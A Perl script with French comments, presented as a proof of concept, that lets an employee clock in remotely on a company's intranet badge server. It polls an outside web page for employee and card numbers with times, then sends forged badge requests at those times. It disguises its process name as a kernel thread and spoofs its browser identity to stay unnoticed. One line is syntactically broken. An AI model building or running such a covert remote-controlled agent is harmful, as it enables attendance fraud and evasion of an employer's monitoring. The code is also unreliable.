#!/usr/local/bin/perl
#########################################################################
# Fichier : zombie:/cmic/autobadge.pl
# Machine : Linux zombie 2.5.20-8 #1 Thu Mar 13 17:54:28 EST 2004
# Red Hat Linux release 9 (Shrike)
# Time-stamp: <2006-01-12 17:20:19 cmic>
#
# -version 5 distribution 
# -version 4 nettoyage du code.
# -version 3 Ajout d'un fork pour realiser plusieurs actions avec 
# plusieurs agents
# -version 1 Premiere partie juste avec la recup de l'heure d'execution.
# -version 2 test avec la gestion de plusieurs horaires et %htask
# 
# Attention : L'utilisation de ce programmee peut entrainer de graves
# problemes de dysfonctionnement du serveur de badge. Je decline toute 
# responsabilite pour l'usage frauduleux qui pourrait tre fait de ce 
# programme. Ce programme est livr dans l'tat en tant q'outil Preuve De 
# Concept et dans le but d'amliorer la scurit du badgeage en intranet.
# Voir l'article http://cmicwiki.freesurf/fr?BadgerSurInternet
#           
# Autobadge.pl : badgeage en entreprise possible a distance a travers
# Internet. 
#                                    cmic:  mkfs at free dot fr
#########################################################################
#
use warnings;
use strict;
use Time::Local;
use Date::Parse;
use HTTP::Cookies;
use HTTP::Request::Common qw(POST GET);
use LWP::UserAgent;

$0="[pdflush]";  #discretion du programme (vu par ps)

my ($ua, $jar, 
    $matricule, $cardid, $date, 
    %htask);

my $BadgeServerPage="http://horaire.intra.perflex.com/time/Badgeage.asp?";
my $InfoServerPage="http://monsite.free.fr/badgeages.html";
my $Domain="perflex.com";
my $HttpProxy="http://proxy3.perflex.com:8080";
 
$ua = new LWP::UserAgent();
$jar = HTTP::Cookies->new();
$ua->cookie_jar($jar);
$ua->agent("Microsoft Internet Explorer/5.5");
$ua->proxy('http', $HttpProxy);
$ua->no_proxy($Domain);
#
# main loop. Limiter la scrutation pour etre discret. 
# ici 345 secondes
#
while () {
    sleep (345);
    ParseTasks();
}

sub ParseTasks
{
    my ($request, $webdoc, $vara);

    $request = new HTTP::Request('GET' => "$InfoServerPage");
    $webdoc = $ua->request($request) || die "Ca marche pas";
    $vara=$webdoc->content;
    while  ($vara =~ /Ravioli (\d+) (\d+) (\d+) (\d\d\d\d-\d\d-\d\d\s\d\d:\d\d)/g ) { 
   	next if (exists $htask{$1});
	DoIt($2, $3, $4);
	MarkTask($1, $4);
    }
}
#
# Lancement des attentes puis des badgeages
# aux heures indiquees. Manque des tests sur fork, sleep, etc.
#
sub DoIt
{
    my ($p_mat, $p_cardid, $p_date)=@_;
    my ($diff, $pid);

    $diff=str2time($p_date)-(time()));
    if ($diff >0) {
	$pid=fork();
	if ($pid) {
	    $SIG{CHLD}='IGNORE';
	    exit();
	} else {
	    sleep ($diff);
	    OneBadge($p_mat, $p_cardid);
	}
    }
}
#
# La tache est marque dans le hash quand elle est
# deja realisee.
#
sub MarkTask
{
    my ($p_taskID, $p_date)=@_;
    $htask{$p_taskID}=$p_date;
}
# 
# La tache child effectue le badgeage sur le 
# serveur de badge.
#
sub OneBadge
{
    my ($p_mat, $p_badge)=@_;
    my ($request, $webdoc);

    $ua->agent("Microsoft Internet Explorer /5.5");
    $request = POST "$BadgeServerPage/Matricule=$p_mat&NomPrenom=&NumTerm=&NumSite=&TypeTerm=&NumBadge=$p_badge" , 
    ['selectTouche' => "0",
     'Submit' => "Valider",
     'OK' => "True",
     ];
    $webdoc = $ua->request($request) || die "Ca marche pas.";
}
#
#FIN

